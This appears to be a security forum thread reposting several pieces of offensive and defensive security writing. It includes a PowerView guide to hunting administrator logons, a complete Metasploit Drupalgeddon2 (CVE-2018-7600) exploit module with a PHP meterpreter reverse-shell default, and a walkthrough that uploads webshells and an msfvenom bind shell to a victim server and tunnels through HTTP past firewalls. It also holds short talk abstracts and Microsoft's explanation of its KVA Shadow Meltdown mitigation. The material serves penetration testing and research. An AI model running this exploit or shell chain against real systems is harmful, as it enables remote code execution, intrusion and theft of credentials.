  6. “I Hunt Sys Admins” Published January 19, 2015 by harmj0y [Edit 8/13/15] – Here is how the old version 1.9 cmdlets in this post translate to PowerView 2.0: Get-NetGroups -> Get-NetGroup Get-UserProperties -> Get-UserProperty Invoke-UserFieldSearch -> Find-UserField Get-NetSessions -> Get-NetSession Invoke-StealthUserHunter -> Invoke-UserHunter -Stealth Invoke-UserProcessHunter -> Invoke-ProcessHunter -Username X Get-NetProcesses -> Get-NetProcess Get-UserLogonEvents -> Get-UserEvent Invoke-UserEventHunter -> Invoke-EventHunter [Note] This post is a companion to the Shmoocon ’15 Firetalks presentation I gave, also appropriately titled “I Hunt Sys Admins”. The slides are here and the video is up on Irongeek. Big thanks to Adrian, @grecs and all the other organizers, volunteers, and sponsors for putting on a cool event! [Edit] I gave an expanded version of my Shmoocon talk at BSides Austin 2015, the slides are up here. One of the most common problems we encounter on engagements is tracking down where specific users have logged in on a network. If you’re in the lateral spread phase of your assessment, this often means gaining some kind of desktop/local admin access and performing the Hunt -> pop box -> Mimikatz -> profit pattern. Other times you may have domain admin access, and want to demonstrate impact by doing something like owning the CEO’s desktop or email. Knowing what users log in to what boxes from where can also give you a better understanding of a network layout and implicit trust relationships. This post will cover various ways to hunt for target users on a Windows network. I’m taking the “assume compromise” perspective, meaning that I’m assuming you already have a foothold on a Windows domain machine. I’ll cover the existing prior art and tradecraft (that I know of) and then will show some of the efforts I’ve implemented with PowerView. 
I really like the concept of “Offense in Depth”: in short, it’s always good to have multiple options in case you hit a snag at some step in your attack chain. PowerShell is great, but you always need to have backups in case something goes wrong.

Existing Tools and Tradecraft

The Sysinternals tool psloggedon.exe has been around for several years. It “…determines who is logged on by scanning the keys under the HKEY_USERS key” as well as using the NetSessionEnum API call. Admins (and hackers) have used this official Microsoft tool for years. One note: some of its functionality requires admin privileges on the remote machine you’re enumerating.

Another “old school” tool we’ve used in the past is netsess.exe, a part of the joeware utilities. It also takes advantage of the NetSessionEnum call, and doesn’t need administrative privileges on a remote host. Think of a “net session” that works on remote machines.

PVEFindADUser.exe is a tool released by the awesome @corelanc0d3r in 2009. Corelanc0d3r talks about the project here. It can help you find AD users, including enumerating the last logged in user for a particular system. However, you do need to have admin access on machines you’re running it against.

Rob Fuller’s (@mubix) netview.exe project is a tool we’ve used heavily since its release at Derbycon 2012. It’s a tool to “enumerate systems using WinAPI calls”. It utilizes NetSessionEnum to find sessions, NetShareEnum to find shares, and NetWkstaUserEnum to find logged on users. It can now also check share access, highlight high value users, and use a delay/jitter. You don’t need administrative privileges to get most of this information from a remote machine.

Nmap’s flexible scripting engine also gives us some options. If you have a valid domain account, or local account valid for several machines, you can use smb-enum-sessions.nse to get remote session information from a remote box. And you don’t need admin privileges!
If you have access to a user’s internal email, you can also glean some interesting information from internal email headers. Search for any chains to/from target users, and check any headers for given email chains. The “X-Originating-IP” header is often present, and can let you trace where a user sent a given email from.

Scott Sutherland (@_nullbind) wrote a post in 2012 highlighting a few other ways to hunt for domain admin processes. Check out techniques 3 and 4, where he details other ways to scan remote machines for specific process owners, as well as how to scan for NetBIOS information of interest using nbtscan. For remote tasklistings, you’ll need local administrator permissions on the targets you’re going after. We’ll return to this in the PowerShell section.

And finally, Smbexec has a checkda module which will check systems for domain admin processes and/or logins. Veil-Pillage takes this a step further with its user_hunter and group_hunter modules, which can give you flexibility beyond just domain admins. For both Smbexec and Veil-Pillage, you will need admin rights on the remote hosts.

Active Directory: It’s a Feature!

Active Directory is an awesome source of information from both offensive and defensive perspectives. One of the biggest turning points in the evolution of my tradecraft was when I began to learn just how much information AD can give up.

Various user fields in Active Directory can give you some great starting points to track down users. The homeDirectory property, which contains the path to a user’s auto-mounted home drive, can give you a good number of file servers. The profilePath property, which contains a user’s roaming profile, can also sometimes give you a few servers to check out as well. Try running something like netsess.exe or netview.exe against these remote servers. The key here is that you’re using AD information to identify servers that several users are likely connected to.
And the best part is, you don’t need any elevated privileges to query this type of user information!

Also, Scott wrote another cool post early in 2014 on using service principal names to find locations where domain admin accounts might be. In short, you can use Scott’s Get-SPN PowerShell script to enumerate all servers where domain admins are registered to run services. I highly recommend checking it out for some more information. This is also something that the prolific Carlos Perez talked about at Derbycon 2014.

Once you get domain admin, but still want to track down particular users, Windows event logs can be a great place to check as well. One of my colleagues (@sixdub) wrote a great post on offensive event parsing for the purposes of user hunting. We’ll return to this as well shortly.

PowerShell PowerShell PowerShell

Anyone who’s read this blog or seen me speak knows that I won’t shut up about PowerShell, Microsoft’s handy post-exploitation language. PowerShell has some awesome AD hooks and various ways to access the lower-level Windows API. @mattifestation has written about several ways to interact with the Windows API through PowerShell here, here, and here. His most recent release with PSReflect makes it super easy to play with this lower-level access. This is something I’ve written about before.

PowerView is a PowerShell situational-awareness tool I’ve been working on for a while that includes a few functions that help you hunt for users. To find users to target, Get-NetGroups *wildcard* will return groups containing specific wildcard terms. Also, Get-UserProperties will extract all user property fields, and Invoke-UserFieldSearch will search particular user fields for wildcard terms. This can sometimes help you narrow down users to hunt for.
For example, we’ve used these functions to find the Linux administrators group and its associated members, so we could then hunt them down and keylog their PuTTY/SSH sessions.

The Invoke-UserHunter function can help you hunt for specific users on the domain. It accepts a username, userlist, or domain group, and accepts a host list or queries the domain for available hosts. It then runs Get-NetSessions and Get-NetLoggedon against every server (using those NetSessionEnum and NetWkstaUserEnum API functions) and compares the results against the resulting target user set. Everything is flexible, letting you define who to hunt for where. Again, admin privileges are not needed.

Invoke-StealthUserHunter can get you good coverage with less traffic. It issues one query to get all users in the domain, extracts all servers from user.HomeDirectories, and runs a Get-NetSessions against each resulting server. As you aren’t touching every single machine like with Invoke-UserHunter, this traffic will be more “stealthy”, but your machine coverage won’t be as complete. We like to use Invoke-StealthUserHunter as a default, falling back to its more noisy brother if we can’t find what we need.

A recently added PowerView function is Invoke-UserProcessHunter. It utilizes the newly christened Get-NetProcesses cmdlet to enumerate the process/tasklists of remote machines, searching for target users. You will need admin access to the machines you’re enumerating.

The last user hunting function in PowerView is the weaponized version of @sixdub’s post described above. The Get-UserLogonEvents cmdlet will query a remote host for logon events (ID 4624). Invoke-UserEventHunter wraps this up into a method that queries all available domain controllers for logon events linked to a particular user. You will need domain admin access in order to query these events from a DC.

If I missed any tools or approaches, please let me know!

Source: http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
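The matching logic described for the two hunter functions can be sketched roughly as follows. This is a minimal Python illustration and not PowerView's code: the function names, the input shapes, and the sample host names are all hypothetical, and the session data is assumed to have been collected already by whatever enumeration tool you use.

```python
import re

def file_servers_from_home_dirs(home_dirs):
    """Extract unique server names from UNC home-directory paths."""
    servers = set()
    for path in home_dirs:
        # A UNC path starts with two backslashes followed by the server name.
        match = re.match(r"^\\\\([^\\]+)\\", path or "")
        if match:
            servers.add(match.group(1).lower())
    return sorted(servers)

def find_target_sessions(sessions_by_host, target_users):
    """Return (host, user) pairs where an enumerated session belongs to a target user."""
    targets = {user.lower() for user in target_users}
    hits = []
    for host, users in sorted(sessions_by_host.items()):
        for user in users:
            if user.lower() in targets:
                hits.append((host, user))
    return hits

# Hypothetical sample data, standing in for AD query and session enumeration results.
home_dirs = [r"\\FS01\homes\alice", r"\\fs01\homes\bob", r"\\FS02\users\carol", None]
sessions = {"fs01": ["alice", "svc_backup"], "fs02": ["Carol"]}

print(file_servers_from_home_dirs(home_dirs))
print(find_target_sessions(sessions, ["carol", "dave"]))
```

The "stealth" variant only differs in where the host list comes from: it is derived from the home-directory paths instead of covering every machine in the domain, which is why its coverage is narrower.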
  7. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name' => 'Drupalgeddon2',
      'Description' => %q{
        CVE-2018-7600 / SA-CORE-2018-002
        Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1
        allows remote attackers to execute arbitrary code because of an issue affecting
        multiple subsystems with default or common module configurations.

        The module can load msf PHP arch payloads, using the php/base64 encoder.

        The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Vitalii Rudnykh',  # initial PoC
          'Hans Topo',        # further research and ruby port
          'José Ignacio Rojo' # further research and msf module
        ],
      'References' =>
        [
          ['SA-CORE', '2018-002'],
          ['CVE', '2018-7600'],
        ],
      'DefaultOptions' =>
        {
          'encoder' => 'php/base64',
          'payload' => 'php/meterpreter/reverse_tcp',
        },
      'Privileged' => false,
      'Platform' => ['php'],
      'Arch' => [ARCH_PHP],
      'Targets' =>
        [
          ['User register form with exec', {}],
        ],
      'DisclosureDate' => 'Apr 15 2018',
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']),
      ])

    register_advanced_options(
      [
      ])
  end

  def uri_path
    normalize_uri(target_uri.path)
  end

  def exploit_user_register
    data = Rex::MIME::Message.new
    data.add_part("php -r '#{payload.encoded}'", nil, nil, 'form-data; name="mail[#markup]"')
    data.add_part('markup', nil, nil, 'form-data; name="mail[#type]"')
    data.add_part('user_register_form', nil, nil, 'form-data; name="form_id"')
    data.add_part('1', nil, nil, 'form-data; name="_drupal_ajax"')
    data.add_part('exec', nil, nil, 'form-data; name="mail[#post_render][]"')
    post_data = data.to_s

    # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
    send_request_cgi({
      'method' => 'POST',
      'uri' => "#{uri_path}user/register",
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data,
      'vars_get' => {
        'element_parents' => 'account/mail/#value',
        'ajax_form' => '1',
        '_wrapper_format' => 'drupal_ajax',
      }
    })
  end

  ##
  # Main
  ##

  def exploit
    case datastore['TARGET']
    when 0
      exploit_user_register
    else
      fail_with(Failure::BadConfig, "Invalid target selected.")
    end
  end
end

Source: https://www.exploit-db.com/exploits/44482/
  8. Interactive bindshell over HTTP
By Kevin, April 18, 2018

Primitives needed
Webshell on a webserver

Intro
What do you do when you have exploited a webserver and really want an interactive shell, but the network has zero open ports and the only way in is through HTTP port 80 on the webserver you’ve exploited? The answer is simple: tunnel your traffic inside HTTP using the existing webserver.

We have had this issue before and ended up with some messy solutions, or sometimes just an open port by luck. Therefore we wanted a more generic approach that could be reused every time we have a webshell. We started writing our own tool called webtunfwd, which did what we wanted. It listened on a local port on our attacking machine, and when we connected to that local port, it would post whatever came out of socket.recv to the webserver with a POST request. The webserver would then take whatever was sent inside this POST request and feed it into the socket connection on the victim.

Note: The diagram below is taken from the Tunna project’s github

So this is a little walkthrough on what happens:
Attacker uploads webtunfwd.php to victim, which is now placed on victim:80/webtunfwd.php
Attacker uploads his malware and/or a meterpreter bindshell which listens on localhost:20000
Victim is now listening on localhost:20000
Attacker calls webtunfwd.php?broker, which connects to localhost:20000 and keeps the connection open
webtunfwd.php?broker reads from the socket and writes it to a tempfile we’ll call out.tmp
webtunfwd.php?broker reads from a tempfile we’ll call in.tmp and writes it to the socket

Great. Now we have webtunfwd.php?broker, which handles the socket connection on the victim side and keeps it open forever. We now need to write to in.tmp and read from out.tmp from our attacking machine. This is handled by our Python script local.py:
Attacker runs local.py on his machine, which listens on localhost:11337
Attacker now connects with the meterpreter client to localhost:11337
When local.py receives the connection it creates 2 threads, one for read and one for write
The read thread reads from the socket and writes to in.tmp by sending a POST request with the data to webtunfwd.php?write
The write thread reads from out.tmp by sending a GET request to webtunfwd.php?read and writes to the socket

So with this code we now have port forwarding through HTTP, and we can run whatever payload on the server we want. But after writing this tool we searched Google a little and found that a tool called Tunna was written for this exact purpose by a company called SECFORCE. So instead of reinventing the wheel by posting our own tool, which didn’t get nearly as much love as the Tunna project did, we’re going to show how Tunna is used in action with a bind shell.

Systems setup
Victim -> Windows 2012 server
Attacker -> Some Linux distro

Prerequisites
Ability to upload a shell to a webserver

Setting up Tunna
The first thing we need to do in order to set up Tunna is to clone the git repository. On the attacking machine run:
git clone https://github.com/SECFORCE/Tunna
This project contains quite a few files. The ones we are going to use are proxy.py and the contents of webshells.
In order for Tunna to work we are first going to upload the webshell that will handle the proxy connection/port forwarding to the victim machine.
In the webshells folder you’ll find conn.aspx - Use whatever method or vulnerability you are exploiting to get it onto the machine.
For now we’re going to assume that the shell conn.aspx is placed on http://victim.com/conn.aspx
Tunna is now set up and ready to use.

Generating a payload
We’re now going to generate our backdoor, which is a simple shell via metasploit.
The shell is going to listen on localhost:12000, which could be any port on localhost as we’ll connect to it through Tunna.
As we want to run our shell on a Windows server running ASPX, we are going to build our backdoor in ASPX format with msfvenom.
We use the following command:
msfvenom --platform Windows -a x64 -p windows/x64/shell/bind_tcp LPORT=12000 LHOST=127.0.0.1 -f aspx --out shell.aspx
--platform - Target platform
-a - Target architecture
-p - Payload to use
LPORT - What port to listen on, on the target
LHOST - The IP of where we are listening
-f - The output format of the payload
--out - Where to save the file
After running this command we should now have shell.aspx
In the same way that we uploaded conn.aspx we should upload shell.aspx. So now we assume that you have the following two files available:
http://victim.com/conn.aspx
http://victim.com/shell.aspx

Launching the attack
So everything is set up. Tunna is uploaded to the server and we have our backdoor ready.
The first thing we’re going to do is browse to http://victim.com/shell.aspx
After running netstat -na on the victim machine, we can see that our shell is listening on port 12000.
Now we go to our attacking machine. We need two things for connecting. The first is proxy.py from Tunna, and the second is our metasploit console.
First we forward the local port 10000 to port 12000 on the remote host with the following command:
python proxy.py -u http://victim.com/conn.aspx -l 10000 -r 12000 -v --no-socks
-u - The target url with the path to the uploaded webshell
-l - The local port to listen on, on the attacking machine
-r - The remote port to connect to, on the victim machine
-v - Verbosity
--no-socks - Do not create a socks proxy. Only port forwarding needed
The output will look like the following when it awaits connections:
The attacking machine now listens locally on port 10000 and we can connect to it through metasploit.
In order to do this we configure metasploit the following way:
And after that is done we enter run. We should now get a shell:
The Tunna status terminal will look like this:

Conclusions
We now have a full TCP connection wrapped in HTTP, which lets us get past strict firewalls and the like. We could have swapped our normal shell for anything we wanted, as Tunna simply forwards the port for us.

Performance suggestions for projects like Tunna
We’ve experimented with some performance upgrades to the Tunna project. One thing that we did not like was the amount of HTTP GET/POST requests sent to and from the server. Our solution to this was to use Transfer-Encoding: chunked. This enabled us to open a GET request and receive bytes whenever they were ready, then wait for the next read from the socket without ever closing the GET request.
We researched many ways to do the same over POST, towards the server, but we couldn’t get around the fact that web servers like Apache internally buffer the chunks they receive, with the buffer set to 8192 bytes.

Source: http://blog.secu.dk/blog/Tunnels_in_a_hard_filtered_network/
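To make the chunked idea a bit more concrete, here is a minimal Python sketch of how payloads are framed with HTTP/1.1 chunked transfer coding. It is not code from Tunna or webtunfwd; the function names are made up for illustration, and the decoder assumes a complete body with no chunk extensions or trailers.

```python
def encode_chunk(data: bytes) -> bytes:
    """Frame one payload as a single chunk: hex length, CRLF, data, CRLF."""
    return b"%x\r\n" % len(data) + data + b"\r\n"

# A zero-length chunk followed by an empty line terminates the body.
LAST_CHUNK = b"0\r\n\r\n"

def decode_chunks(stream: bytes):
    """Yield each chunk payload from a complete chunked body."""
    pos = 0
    while True:
        line_end = stream.index(b"\r\n", pos)
        size = int(stream[pos:line_end], 16)
        if size == 0:
            return
        start = line_end + 2
        yield stream[start:start + size]
        pos = start + size + 2  # skip the payload and its trailing CRLF

body = encode_chunk(b"hello") + encode_chunk(b"world!") + LAST_CHUNK
print(list(decode_chunks(body)))
```

Because each chunk carries its own length, the server side can keep one response open and emit a new chunk whenever the socket has data, instead of answering one request per read.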
  9. Are nightmares of data breaches and targeted attacks keeping your CISO up at night? You know you should be hunting for these threats, but where do you start? Told in the style of the popular children's story spoof, this soothing bedtime tale will lead Li'l Threat Hunters through the first five hunts they should do to find bad guys and, ultimately, help their CISOs "Go the F*#k to Sleep." By David Bianco & Robert Lee Full Abstract & Presentation Materials: https://www.blackhat.com/us-17/briefi...
  10. Hooking Chrome’s SSL functions
On 26 February 2018 by nytrosecurity

The purpose of NetRipper is to hook the functions that encrypt or decrypt data and send it over the network. This can be easily achieved for applications such as Firefox, where it is enough to find two DLL exported functions: PR_Read and PR_Write, but it is way more difficult for Google Chrome, where the SSL_Read and SSL_Write functions are not exported. The main problem for someone who wants to intercept such calls is that we cannot easily find the functions inside the huge chrome.dll file. So we have to manually find them in the binary. But how can we do it?

Chrome’s source code
In order to achieve our goal, the best starting point might be Chrome’s source code. We can find it here: https://cs.chromium.org/ . It allows us to easily search and navigate through the source code.

Full article: https://nytrosecurity.com/2018/02/26/hooking-chromes-ssl-functions/
  11. 1. Stack based buffer overflow 2. What is the result of this exploit?
  12. https://nytrosecurity.com/2018/03/31/netripper-at-blackhat-asia-arsenal-2018/
  13. From Public Key to Exploitation: Exploiting the Authentication in MS-RDP [CVE-2018-0886]
In the March 2018 Patch Tuesday, Microsoft released a patch for CVE-2018-0886, a critical vulnerability that was discovered by Preempt. This vulnerability can be classified as a logical remote code execution (RCE) vulnerability. It consists of a design flaw in CredSSP, a Security Support Provider involved in Microsoft Remote Desktop and Windows Remote Management (including PowerShell sessions). An attacker with complete Man in the Middle (MITM) control over such a session can abuse it to run arbitrary code on the target server on behalf of the user! This vulnerability affects all Windows versions.
Download this white paper to learn:
How Preempt researchers found the vulnerability
How we were able to exploit authentication in MS-RDP
What you need to do to protect your organization
Download now.
Source: https://www.preempt.com/white-paper/from-public-key-to-exploitation-exploiting-the-authentication-in-ms-rdp-cve-2018-0886/
  14. KVA Shadow: Mitigating Meltdown on Windows swiat March 23, 2018 On January 3rd, 2018, Microsoft released an advisory and security updates that relate to a new class of discovered hardware vulnerabilities, termed speculative execution side channels, that affect the design methodology and implementation decisions behind many modern microprocessors. This post dives into the technical details of Kernel Virtual Address (KVA) Shadow which is the Windows kernel mitigation for one specific speculative execution side channel: the rogue data cache load vulnerability (CVE-2017-5754, also known as “Meltdown” or “Variant 3”). KVA Shadow is one of the mitigations that is in scope for Microsoft's recently announced Speculative Execution Side Channel bounty program. It’s important to note that there are several different types of issues that fall under the category of speculative execution side channels, and that different mitigations are required for each type of issue. Additional information about the mitigations that Microsoft has developed for other speculative execution side channel vulnerabilities (“Spectre”), as well as additional background information on this class of issue, can be found here. Please note that the information in this post is current as of the date of this post. Vulnerability description & background The rogue data cache load hardware vulnerability relates to how certain processors handle permission checks for virtual memory. Processors commonly implement a mechanism to mark virtual memory pages as owned by the kernel (sometimes termed supervisor), or as owned by user mode. While executing in user mode, the processor prevents accesses to privileged kernel data structures by way of raising a fault (or exception) when an attempt is made to access a privileged, kernel-owned page. This protection of kernel-owned pages from direct user mode access is a key component of privilege separation between kernel and user mode code. 
Certain processors capable of speculative out-of-order execution, including many currently in-market processors from Intel, and some ARM-based processors, are susceptible to a speculative side channel that is exposed when an access to a page incurs a permission fault. On these processors, an instruction that performs an access to memory that incurs a permission fault will not update the architectural state of the machine. However, these processors may, under certain circumstances, still permit a faulting internal memory load µop (micro-operation) to forward the result of the load to subsequent, dependent µops. These processors can be said to defer handling of permission faults to instruction retirement time. Out of order processors are obligated to “roll back” the architecturally-visible effects of speculative execution down paths that are proven to have never been reachable during in-program-order execution, and as such, any µops that consume the result of a faulting load are ultimately cancelled and rolled back by the processor once the faulting load instruction retires. However, these dependent µops may still have issued subsequent cache loads based on the (faulting) privileged memory load, or otherwise may have left additional traces of their execution in the processor’s caches. This creates a speculative side channel: the remnants of cancelled, speculative µops that operated on the data returned by a load incurring a permission fault may be detectable through disturbances to the processor cache, and this may enable an attacker to infer the contents of privileged kernel memory that they would not otherwise have access to. In effect, this enables an unprivileged user mode process to disclose the contents of privileged kernel mode memory.

Operating system implications

Most operating systems, including Windows, rely on per-page user/kernel ownership permissions as a cornerstone of enforcing privilege separation between kernel mode and user mode.
A speculative side channel that enables unprivileged user mode code to infer the contents of privileged kernel memory is problematic given that sensitive information may exist in the kernel’s address space. Mitigating this vulnerability on affected, in-market hardware is especially challenging, as user/kernel ownership page permissions must be assumed to no longer prevent the disclosure (i.e., reading) of kernel memory contents from user mode. Thus, on vulnerable processors, the rogue data cache load vulnerability impacts the primary tool that modern operating system kernels use to protect themselves from privileged kernel memory disclosure by untrusted user mode applications. In order to protect kernel memory contents from disclosure on affected processors, it is thus necessary to go back to the drawing board with how the kernel isolates its memory contents from user mode. With the user/kernel ownership permission no longer effectively safeguarding against memory reads, the only other broadly-available mechanism to prevent disclosure of privileged kernel memory contents is to entirely remove all privileged kernel memory from the processor’s virtual address space while executing user mode code. This, however, is problematic, in that applications frequently make system service calls to request that the kernel perform operations on their behalf (such as opening or reading a file on disk). These system service calls, as well as other critical kernel functions such as interrupt processing, can only be performed if their requisite, privileged code and data are mapped in to the processor’s address space. 
This presents a conundrum: in order to meet the security requirements of kernel privilege separation from user mode, no privileged kernel memory may be mapped into the processor’s address space, and yet in order to reasonably handle any system service call requests from user mode applications to the kernel, this same privileged kernel memory must be quickly accessible for the kernel itself to function. The solution to this quandary is to, on transitions between kernel mode and user mode, also switch the processor’s address space between a kernel address space (which maps the entire user and kernel address space), and a shadow user address space (which maps the entire user memory contents of a process, but only a minimal subset of kernel mode transition code and data pages needed to switch into and out of the kernel address space). The select set of privileged kernel code and data transition pages handling the details of these address space switches, which are “shadowed” into the user address space are “safe” in that they do not contain any privileged data that would be harmful to the system if disclosed to an untrusted user mode application. In the Windows kernel, the usage of this disjoint set of shadow address spaces for user and kernel modes is called “kernel virtual address shadowing”, or KVA shadow, for short. In order to support this concept, each process may now have up to two address spaces: the kernel address space and the user address space. As there is no virtual memory mapping for other, potentially sensitive privileged kernel data when untrusted user mode code executes, the rogue data cache load speculative side channel is completely mitigated. This approach is not, however, without substantial complexity and performance implications, as will later be discussed. 
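The two-address-space idea can be illustrated with a toy model. The Python sketch below is only a conceptual illustration under loud assumptions: real address spaces are page tables switched by the processor, not Python sets, and every page label and class name here is hypothetical rather than taken from the Windows kernel.

```python
# Toy page labels; all names are made up for illustration.
USER_PAGES = {"app_code", "app_heap", "app_stack"}
TRANSITION_PAGES = {"trap_entry_code", "transition_stack"}  # "safe" to expose
PRIVILEGED_PAGES = {"kernel_heap", "thread_kernel_stack", "file_cache"}

# The kernel address space maps everything; the shadow user address space
# maps user memory plus only the minimal transition pages.
KERNEL_ADDRESS_SPACE = USER_PAGES | TRANSITION_PAGES | PRIVILEGED_PAGES
SHADOW_USER_ADDRESS_SPACE = USER_PAGES | TRANSITION_PAGES

class ToyProcessor:
    """Tracks which address space is active across kernel entry and exit."""

    def __init__(self):
        self.address_space = SHADOW_USER_ADDRESS_SPACE  # start in user mode

    def kernel_entry(self):
        self.address_space = KERNEL_ADDRESS_SPACE

    def kernel_exit(self):
        self.address_space = SHADOW_USER_ADDRESS_SPACE

    def is_mapped(self, page):
        return page in self.address_space

cpu = ToyProcessor()
print(cpu.is_mapped("kernel_heap"))      # user mode: privileged page not mapped
cpu.kernel_entry()
print(cpu.is_mapped("kernel_heap"))      # kernel mode: everything is mapped
cpu.kernel_exit()
print(cpu.is_mapped("trap_entry_code"))  # transition pages stay mapped
```

The point of the model is that while user mode code runs there is simply no mapping for privileged pages, so a speculative load has nothing to read, while the transition pages remain reachable so that the next kernel entry can still happen.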
On a historical note, some operating systems previously have implemented similar mechanisms for a variety of different and unrelated reasons: For example, in 2003 (prior to the common introduction of 64-bit processors in most broadly-available consumer hardware), with the intention of addressing larger amounts of virtual memory on 32-bit systems, optional support was added to the 32-bit x86 Linux kernel in order to provide a 4GB virtual address space to user mode, and a separate 4GB address space to the kernel, requiring address space switches on each user/kernel transition. More recently, a similar approach, termed KAISER, has been advocated to mitigate information leakage about the kernel virtual address space layout due to processor side channels. This is distinct from the rogue data cache load speculative side channel issue, in that no kernel memory contents, as opposed to address space layout information, were at the time considered to be at risk prior to the discovery of speculative side channels. KVA shadow implementation in the Windows kernel While the design requirements of KVA shadow may seem relatively innocuous, (privileged kernel-mode memory must not be mapped in to the address space when untrusted user mode code runs) the implications of these requirements are far-reaching throughout Windows kernel architecture. This touches a substantial number of core facilities for the kernel, such as memory management, trap and exception dispatching, and more. The situation is further complicated by a requirement that the same kernel code and binaries must be able to run with and without KVA shadow enabled. Performance of the system in both configurations must be maximized, while simultaneously attempting to keep the scope of the changes required for KVA shadow as contained as possible. This maximizes maintainability of code in both KVA shadow and non-KVA-shadow configurations. 
This section focuses primarily on the implications of KVA shadow for the 64-bit x86 (x64) Windows kernel. Most considerations for KVA shadow on x64 also apply to 32-bit x86 kernels, though there are some divergences between the two architectures. This is due to ISA differences between 64-bit and 32-bit modes, particularly with trap and exception handling. Please note that the implementation details described in this section are subject to change without notice in the future. Drivers and applications must not take dependencies on any of the internal behaviors described below without first checking for updated documentation. The best way to understand the complexities involved with KVA shadow is to start with the underlying low-level interface in the kernel that handles the transitions between user mode and kernel mode. This interface, called the trap handling code, is responsible for fielding traps (or exceptions) that may occur from either kernel mode or user mode. It is also responsible for dispatching system service calls and hardware interrupts. There are several events that the trap handling code must handle, but the most relevant for KVA shadow are those called “kernel entry” and “kernel exit” events. These events, respectively, involve transitions from user mode into kernel mode, and from kernel mode into user mode. Trap handling and system service call dispatching overview and retrospective As a quick recap of how the Windows kernel dispatches traps and exceptions on x64 processors, traditionally, the kernel programs the current thread’s kernel stack pointer into the current processor’s TSS (task state segment), specifically into the KTSS64.Rsp0 field, which informs the processor which stack pointer (RSP) value to load up on a ring transition to ring 0 (kernel mode) code. 
This field is traditionally updated by the kernel on context switch, and several other related internal events; when a switch to a different thread occurs, the processor KTSS64.Rsp0 field is updated to point to the base of the new thread’s kernel stack, such that any kernel entry event that occurs while that thread is running enters the kernel already on that thread’s stack. The exception to this rule is that of system service calls, which typically enter the kernel with a “syscall” instruction; this instruction does not switch the stack pointer and it is the responsibility of the operating system trap handling code to manually load up an appropriate kernel stack pointer. On typical kernel entry, the hardware has already pushed what is termed a “machine frame” (internally, MACHINE_FRAME) on the kernel stack; this is the processor-defined data structure that the IRETQ instruction consumes and removes from the stack to effect an interrupt-return, and includes details such as the return address, code segment, stack pointer, stack segment, and processor flags on the calling application. The trap handling code in the Windows kernel builds a structure called a trap frame (internally, KTRAP_FRAME) that begins with the hardware-pushed MACHINE_FRAME, and then contains a variety of software-pushed fields that describe the volatile register state of the context that was interrupted. System calls, as noted above, are an exception to this rule, and must manually build the entire KTRAP_FRAME, including the MACHINE_FRAME, after effecting a stack switch to an appropriate kernel stack for the current thread. KVA shadow trap and system service call dispatching design considerations With a basic understanding of how traps are handled without KVA shadow, let’s dive into the details of the KVA shadow-specific considerations of trap handling in the kernel. 
When designing KVA shadow, several design considerations applied to trap handling when KVA shadow was active, namely, that the security requirements were met, that performance impact on the system was minimized, and that changes to the trap handling code were kept as compartmentalized as possible in order to simplify code and improve maintainability. For example, it is desirable to share as much trap handling code between the KVA shadow and non-KVA shadow configurations as practical, so that it is easier to make changes to the kernel’s trap handling facilities in the future.

When KVA shadowing is active, user mode code typically runs with the user mode address space selected. It is the responsibility of the trap handling code to switch to the kernel address space on kernel entry, and to switch back to the user address space on kernel exit. However, additional details apply: it is not sufficient to simply switch address spaces, because the only transition kernel pages that can be permitted to exist in (or be “shadowed into”) the user address space are those that hold contents that are “safe” to disclose to user mode.

The first complication that KVA shadow encounters is that it would be inappropriate to shadow the kernel stack pages for each thread into the user mode address space, as this would allow potentially sensitive, privileged kernel memory contents on kernel thread stacks to be leaked via the rogue data cache load speculative side channel. It is also desirable to keep the set of code and data structures that are shadowed into the user mode address space to a minimum, and if possible, to only shadow permanent fixtures in the address space (such as portions of the kernel image itself, and critical per-processor data structures such as the GDT (Global Descriptor Table), IDT (Interrupt Descriptor Table), and TSS).
This simplifies memory management, as handling setup and teardown of new mappings that are shadowed into user mode address spaces has associated complexities, as would enabling any shadowed mappings to become pageable. For these reasons, it was clear that it would not be acceptable for the kernel’s trap handling code to continue to use the per-kernel-thread stack for kernel entry and kernel exit events. Instead, a new approach would be required. The solution that was implemented for KVA shadow was to switch to a mode of operation wherein a small set of per-processor stacks (internally called KTRANSITION_STACKs) are the only stacks that are shadowed into the user mode address space. Eight of these stacks exist for each processor, the first of which represents the stack used for “normal” kernel entry events, such as exceptions, page faults, and most hardware interrupts, and the remaining seven transition stacks represent the stacks used for traps that are dispatched using the x64-defined IST (Interrupt Stack Table) mechanism (note that Windows does not use all 7 possible IST stacks presently). When KVA shadow is active, then, the KTSS64.Rsp0 field of each processor points to the first transition stack of each processor, and each of the KTSS64.Ist[n] fields point to the n-th KTRANSITION_STACK for that processor. For convenience, the transition stacks are located in a contiguous region of memory, internally termed the KPROCESSOR_DESCRIPTOR_AREA, that also contains the per-processor GDT, IDT, and TSS, all of which are required to be shadowed into the user mode address space for the processor itself to be able to handle ring transitions properly. This contiguous memory block is, itself, shadowed in its entirety. This configuration ensures that when a kernel entry event is fielded while KVA shadow is active, that the current stack is both shadowed into the user mode address space, and does not contain sensitive memory contents that would be risky to disclose to user mode. 
However, in order to maintain these properties, the trap dispatch code must be careful to push no sensitive information onto any transition stack at any time. This necessitates the first several rules for KVA shadow, in order to prevent any other memory contents from being stored onto the transition stacks: when executing on a transition stack, the kernel must be fielding a kernel entry or kernel exit event, interrupts must be disabled and must remain disabled throughout, and the code executing on a transition stack must be careful to never incur any other type of kernel trap. This also implies that the KVA shadow trap dispatch code can assume that traps arising in kernel mode already are executing with the correct CR3, and on the correct kernel stack (except for some special considerations for IST-delivered traps, as discussed below).

Fielding a trap with KVA shadow active

